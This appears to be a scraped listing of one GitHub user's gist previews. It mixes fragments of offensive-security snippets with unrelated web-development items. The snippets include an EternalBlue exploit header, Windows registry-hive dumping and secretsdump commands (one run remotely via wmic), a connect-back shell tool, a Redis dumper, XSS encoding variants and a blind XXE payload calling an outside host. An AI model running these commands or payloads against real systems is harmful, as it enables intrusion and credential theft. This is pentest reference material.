KbaHaxor

Keybase proof

I hereby claim:

• I am kbahaxor on github.

• I am anhnt1337 (https://keybase.io/anhnt1337) on keybase.

• I have a public key ASDvh58Jca335qmWRz_99VqS13MgC3HgQPMiF1OJ01n5QAo

KbaHaxor

Android Penetration Testing Tools 2015
by CHEF-KOCH
==============

Note:
1.    These apps are not for beginners because expertise is needed on the Android platform.
2.    Most of the apps work on Rooted Android devices. So root your Android device first. If you are not sure how to do it, learn how to by, reading one of the many sites available to help with this process.
3.    You will lose your device’s warranty if you root it, so think twice before proceeding.
4.    These apps can also harm your Android device. So please try these apps at your own risk

KbaHaxor

<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060

KbaHaxor

#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

KbaHaxor

reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"

KbaHaxor

/*
Connect back tools
compile under linux
2003-07-11 now support FreeBSD ..
now support user define echo value
[bkbll@mobile bkbll]$ uname -a
Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown
%uname -a
FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
[bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555

KbaHaxor

/*
   Dump data from open Redis instance. 
   Usage: node redis_dump.js -h 10.10.0.1
          node redis_dump.js -n 10  #dumps the first 10 keys from the instance
          node redis_dump.js -k keyname #dump the value of a specific key
   Author: etienne@sensepost.com
   Version: 1.0 12 February 2015
*/

var redis = require("redis")

KbaHaxor

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

KbaHaxor

<?php

session_start();
ob_start();

?>
<!DOCTYPE html>
<html>
<head>
    <title>Add a story</title>

KbaHaxor

http://o7planning.org/vi/10285/tao-mot-ung-dung-java-web-don-gian-su-dung-servlet-jsp-va-jdbc
http://khanhspring.com/java-web-voi-jspservlet-bai-1-thiet-lap-moi-truong-cac-cong-cu-lap-trinh/
https://javasimplecode.wordpress.com/2014/04/09/
http://minhbangchu.blogspot.com/2013/05/tao-ung-dung-voi-struts-framework.html
http://ducnxq.blogspot.com/2014/04/j2ee-gioi-thieu-tong-quan-ve-framework.html
http://vietjack.com/struts_2/login_va_logout_trong_struts_2.jsp
http://www.zbook.vn/ebook/ung-dung-struts-va-hibernate-trong-quan-ly-cong-viec-cho-cong-ty-chung-khoan-5792/